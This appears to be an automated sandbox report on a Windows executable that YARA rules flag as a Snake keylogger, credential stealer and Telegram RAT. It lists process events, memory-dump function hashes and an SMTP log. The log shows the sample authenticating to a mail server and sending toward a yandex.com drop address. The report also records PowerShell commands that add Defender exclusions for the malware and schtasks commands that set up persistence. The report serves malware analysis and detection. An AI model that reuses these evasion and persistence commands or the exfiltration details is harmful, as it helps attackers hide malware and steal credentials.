Dec 16, 2024 14:23:48.802925110 CET	587	49847	118.69.190.131	192.168.2.6	550-Account sales-nguyen@vvtrade.vn currently blocked for sending to too many 550 invalid recipients
Dec 16, 2024 14:23:48.853477955 CET	587	49852	118.69.190.131	192.168.2.6	334 UGFzc3dvcmQ6
Dec 16, 2024 14:23:49.436247110 CET	587	49852	118.69.190.131	192.168.2.6	235 Authentication succeeded
Dec 16, 2024 14:23:49.436610937 CET	49852	587	192.168.2.6	118.69.190.131	MAIL FROM:<sales-nguyen@vvtrade.vn>
Dec 16, 2024 14:23:50.005225897 CET	587	49852	118.69.190.131	192.168.2.6	250 OK
Dec 16, 2024 14:23:50.005471945 CET	49852	587	192.168.2.6	118.69.190.131	RCPT TO:<saleseuropower@yandex.com>
Dec 16, 2024 14:23:50.573951960 CET	587	49852	118.69.190.131	192.168.2.6	550-Account sales-nguyen@vvtrade.vn currently blocked for sending to too many 550 invalid recipients

Target ID:	0
Start time:	08:23:03
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\FT876567090.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FT876567090.exe"
Imagebase:	0x610000
File size:	782'336 bytes
MD5 hash:	773778752662F5A81D6B7A2015890B79
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:23:04
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe"
Imagebase:	0x490000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:23:04
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:23:05
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"
Imagebase:	0x490000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:23:05
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:23:05
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp"
Imagebase:	0x400000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:23:05
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:23:06
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\FT876567090.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FT876567090.exe"
Imagebase:	0x980000
File size:	782'336 bytes
MD5 hash:	773778752662F5A81D6B7A2015890B79
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3392046185.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	08:23:08
Start date:	16/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:23:09
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe
Imagebase:	0x8f0000
File size:	782'336 bytes
MD5 hash:	773778752662F5A81D6B7A2015890B79
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:23:10
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp619B.tmp"
Imagebase:	0x400000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:23:10
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:23:10
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"
Imagebase:	0xe20000
File size:	782'336 bytes
MD5 hash:	773778752662F5A81D6B7A2015890B79
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3396800295.0000000004425000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.3390924672.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.8%
Total number of Nodes:	296
Total number of Limit Nodes:	13

Executed Functions

Function 070E2C96 Relevance: 4.1, Strings: 3, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 070E2FCB
ry, xrefs: 070E2FE2
ry, xrefs: 070E2FC4

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: 69400e11b475c1eb29520ac43776cd2b0d6bed199899f200286137ded97dade1
Instruction ID: 1131b636097149248fa626e517ba580f9cc5469902fdc963e7465d88e6c3e6a2
Opcode Fuzzy Hash: 69400e11b475c1eb29520ac43776cd2b0d6bed199899f200286137ded97dade1
Instruction Fuzzy Hash: 08D17DB5D0461ADFCB14CFA5C4858EEFBBAFF89301B118656D412AB314D7349A82CF90

Function 070E2CAD Relevance: 4.1, Strings: 3, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 070E2FCB
ry, xrefs: 070E2FE2
ry, xrefs: 070E2FC4

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: 6daa767ef2ae4daffa6ec656967b253a84fe9b2cd58b9a686da05b27c378b2cd
Instruction ID: 6363c40652584e7e548726a6617360684703dbc3ebb53fde38213269cdb02b2d
Opcode Fuzzy Hash: 6daa767ef2ae4daffa6ec656967b253a84fe9b2cd58b9a686da05b27c378b2cd
Instruction Fuzzy Hash: 05D15CB5D1461ADFCB14CFA5C4858EEFBBAFF89300B158656D412AB318D7349A82CF90

Function 070E2CF8 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 070E2FCB
ry, xrefs: 070E2FE2
ry, xrefs: 070E2FC4

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: f42098f63610ce74f1ddb138d224eff4bcc1087abdff6a964b4e62063204d7eb
Instruction ID: 2e9286fd68bd3f2bb61f98bb11ec2eb65279ab7995fdac63296719ddcaf03d57
Opcode Fuzzy Hash: f42098f63610ce74f1ddb138d224eff4bcc1087abdff6a964b4e62063204d7eb
Instruction Fuzzy Hash: 74C169B0E1461ADFCB14CFA5C4858AEFBBAFF89300F118655D516AB318D734AA42CF94

Function 070E96C8 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TuA, xrefs: 070E9838
UC;", xrefs: 070E98B6

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
Opcode ID: d7be095c875872db7f088f51d3845b9c6c5e47244fb13d320e4755ccac32c098
Instruction ID: 17fd51063f05267d447dc6a81a45fe48f0883b624ee149cc1b0704d18bcf70bc
Opcode Fuzzy Hash: d7be095c875872db7f088f51d3845b9c6c5e47244fb13d320e4755ccac32c098
Instruction Fuzzy Hash: 649139B4D24209EFCB08CFE6E58059EFBF6EF89350F10A52AE525A7264D730A945CF41

Function 070E96C6 Relevance: 2.7, Strings: 2, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TuA, xrefs: 070E9838
UC;", xrefs: 070E98B6

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
Opcode ID: 4a7a14e6d1c62dea096e0fd89487e87fe9a0460fa45868418d5b6fcefe0d88b9
Instruction ID: 0552b88452a46f6db6c0184c242cedf67f14445e4c227a73b4114a17400b189a
Opcode Fuzzy Hash: 4a7a14e6d1c62dea096e0fd89487e87fe9a0460fa45868418d5b6fcefe0d88b9
Instruction Fuzzy Hash: 619147B4D24209EFCB08CFA6E58059EFBF6EF89350F10A52AE525A7264D730A945CF41

Function 070E0B3D Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

z^I, xrefs: 070E0D51

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: z^I
API String ID: 0-307258731
Opcode ID: 5048da9114d7608332a975f581273c329abc1cdf55e56e29052361b35a299d9f
Instruction ID: 74b7029d6d9d6584a97e08d4ae6644dac72016937d4022ede0b61efd2d841602
Opcode Fuzzy Hash: 5048da9114d7608332a975f581273c329abc1cdf55e56e29052361b35a299d9f
Instruction Fuzzy Hash: EAA125B5E142198FDB08CFA9C8406DDFBF2FF89310F24852AD415AB259D7749981CF64

Function 070E0B76 Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

z^I, xrefs: 070E0D51

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: z^I
API String ID: 0-307258731
Opcode ID: 332fb36b128a5d1217103b4ed3046f417acf40a0ffdb11f6dff57ea80153ee76
Instruction ID: 0458a6258ec5d563d9b2eb0c587a07b20b0eeb47a85e38710ad5b1741b560e6f
Opcode Fuzzy Hash: 332fb36b128a5d1217103b4ed3046f417acf40a0ffdb11f6dff57ea80153ee76
Instruction Fuzzy Hash: C7A1F4B4E112198FCB04CFAAC984ADDFBB6FF89300F24912AD415BB259D7349945CF64

Function 070E0B90 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

z^I, xrefs: 070E0D51

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: z^I
API String ID: 0-307258731
Opcode ID: 3e1fad00229814456b26e884c7d31682b1dede36bf3a04e2666570b6b6194cb7
Instruction ID: 86521bd8c13e8ef216438fecad1a4b4626a056f93fe445e0261a5fdda6bb58ee
Opcode Fuzzy Hash: 3e1fad00229814456b26e884c7d31682b1dede36bf3a04e2666570b6b6194cb7
Instruction Fuzzy Hash: AD91E3B4E112198FCB08CFAAC5846DEFBB6FF89300F24952AD415BB258D7749941CF64

Function 070E8090 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

5=6, xrefs: 070E81CE

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: ec4f4bcb962ba940c38bfc33548037cb969cca79fe7ab9beb841d0bc2f29891f
Instruction ID: 4c73fc58b0bc1fedec368f21141848c17e388b2495b75841a6ff2379f4c343df
Opcode Fuzzy Hash: ec4f4bcb962ba940c38bfc33548037cb969cca79fe7ab9beb841d0bc2f29891f
Instruction Fuzzy Hash: 01715C74E2520AAFCB44CFA5D9454AEFBF2FF89200F10E96AD126E7294D7349A41CF50

Function 070E80A0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

5=6, xrefs: 070E81CE

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: 75d5fcd12e9443d1bcf694ec80ae7409f4d3936cf451ab6850a1ad516869073a
Instruction ID: aeae737e3f7e4cb0000501bb00f89081f4d286475991fef914b2b690c3c2ab35
Opcode Fuzzy Hash: 75d5fcd12e9443d1bcf694ec80ae7409f4d3936cf451ab6850a1ad516869073a
Instruction Fuzzy Hash: EE614A74E2520AAFCB44CFA5D9454AEFBF6FF89200F00E96AD126E7294D7349A41CF50

Function 04F76DC0 Relevance: .8, Instructions: 839COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185657409.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f70000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451053858994c4d706b32685f1466da26fb13e06b63cf3e20a6c2efc289e48d1
Instruction ID: 8cd786e60a86ff87b9acd8c8d46f680b2738207d7edd2338f002698e56a4b6b4
Opcode Fuzzy Hash: 451053858994c4d706b32685f1466da26fb13e06b63cf3e20a6c2efc289e48d1
Instruction Fuzzy Hash: 2892E434A00659CFEB14DF64C894AD9B7B1FF89305F1186EAD409AB360DB31AE86CF50

Function 04F76DB2 Relevance: .8, Instructions: 837COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185657409.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f70000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 540c1029e5225311b83854e397a2294cd613ea12ce518fee7a6a458739dc7b91
Instruction ID: 5d2f9ced7691922cd470c0db60b4369c2762362e27a7901830ff81a3381e4017
Opcode Fuzzy Hash: 540c1029e5225311b83854e397a2294cd613ea12ce518fee7a6a458739dc7b91
Instruction Fuzzy Hash: 2092E434A00659CFEB14DF64C894AD9B7B1FF89305F1186EAD409AB361DB35AE86CF40

Function 055361A8 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2186142415.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5301dc2f7cbacf2aadf7c3d97523bd3ea0905a6f6c586ad539ac2e8d05a46b6b
Instruction ID: 0a34f0ed84097584fc84952d8a8bcef27ca66f6512a20684054cac7ead28942a
Opcode Fuzzy Hash: 5301dc2f7cbacf2aadf7c3d97523bd3ea0905a6f6c586ad539ac2e8d05a46b6b
Instruction Fuzzy Hash: 5F425E70E002188FEB54DFA9C85579EBBF2BF85300F148569D449AB385DB34AD45CFA1

Function 070D9620 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e03251fe20bf2ea6e99c9c926390d7f1d105dfe45f56b6f874472191dace295
Instruction ID: 90972bb4afa96a24a75373b8a9be74bd00db1a3edef35d8f89be2d61841c06b5
Opcode Fuzzy Hash: 5e03251fe20bf2ea6e99c9c926390d7f1d105dfe45f56b6f874472191dace295
Instruction Fuzzy Hash: 8032A9B0B113058FEB19DB69D564BAEB7F6EF89314F248169E1069B3A0CB34EC01CB51

Function 05539FF1 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2186142415.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 603b9443b84a8ab3b5a71129de82a5b1ef371ebaf8a56762eb7d579c3958c45c
Instruction ID: 7997a4d3b68c3af4ed4e3a8f9b99e3b21ac0724cf9cb13b38bbdae9ced0412cd
Opcode Fuzzy Hash: 603b9443b84a8ab3b5a71129de82a5b1ef371ebaf8a56762eb7d579c3958c45c
Instruction Fuzzy Hash: 82C15B31E002559FDF15CFA9C881B9DBBB2BF88300F14C5AAD449AB255EB74E985CF90

Function 070E1E7A Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188889789.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff779195229f06dfaeafb3072287c0baad3679d3567fd3b6a8675ed12ba5f0a
Instruction ID: 29bed54415ca568c7a6ca4e8e529c538f7f9fd09815bea59741c9d3eb835ad2d
Opcode Fuzzy Hash: 5ff779195229f06dfaeafb3072287c0baad3679d3567fd3b6a8675ed12ba5f0a
Instruction Fuzzy Hash: 6D31F7B1E016588FEB18CFA6D9402DEBBF7AFC9314F14C16AD409A7264DB345A46CF50

Function 070D7A10 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c68b5db4bf2509dd5985cb0437611ec47f37fb0fe3e6eb452a2027dc106a877
Instruction ID: 0dfd312dc4ae6fb2422ccbde72d6e8bc13b2af882249e4ee6633740512abdf77
Opcode Fuzzy Hash: 5c68b5db4bf2509dd5985cb0437611ec47f37fb0fe3e6eb452a2027dc106a877
Instruction Fuzzy Hash: 6411C3B4818329CFCB60DF64D8497ECB7B8AB4A311F51669AC41EA2291D7349E85CF10

Function 070D475D Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070D499E

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1de00f7bae53740edee6535b889b7cac47d6a82ff7e488f94735c6409947aca7
Instruction ID: cb7e251c04e67a0febff747518dc0029940cb2e6f2bd367baded344266541f62
Opcode Fuzzy Hash: 1de00f7bae53740edee6535b889b7cac47d6a82ff7e488f94735c6409947aca7
Instruction Fuzzy Hash: FDA13BB1D0079ADFEB24CF68C84179DBBF2BF48314F148669E809A7250DB749985CF92

Function 070D4768 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070D499E

Memory Dump Source

Source File: 00000000.00000002.2188421808.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70d0000_FT876567090.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d82808d4a2043508e50ea7041ceabe4a9a6944b338a5e004aa6b5c7c2f1a9116
Instruction ID: cdc276dba20f643e7e971f739a6b108a644a903822f607eeb99c4451771e0214
Opcode Fuzzy Hash: d82808d4a2043508e50ea7041ceabe4a9a6944b338a5e004aa6b5c7c2f1a9116
Instruction Fuzzy Hash: A0913BB1D0079ADFEB24CF68C84179DBBF2BF48314F148269E809A7250DB749985CF91

Function 04E4AE48 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04E4B09E

Memory Dump Source

Source File: 00000000.00000002.2183336343.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_FT876567090.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d0b53f3623af4a659e7acc0f3a7626e859e63dc8ca4c440774fe6905c0d66529
Instruction ID: 237807f7b0e17e94eadd0d2d804ff2e7975ea81ccc0e64ae632aa3dc7defb8b2
Opcode Fuzzy Hash: d0b53f3623af4a659e7acc0f3a7626e859e63dc8ca4c440774fe6905c0d66529
Instruction Fuzzy Hash: 7C7115B0A00B058FE724DF2AE45075ABBF1FF88314F00892DE45A97A40D775F945CBA5

Function 04F718E4 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F71A02

Memory Dump Source

Source File: 00000000.00000002.2185657409.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f70000_FT876567090.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
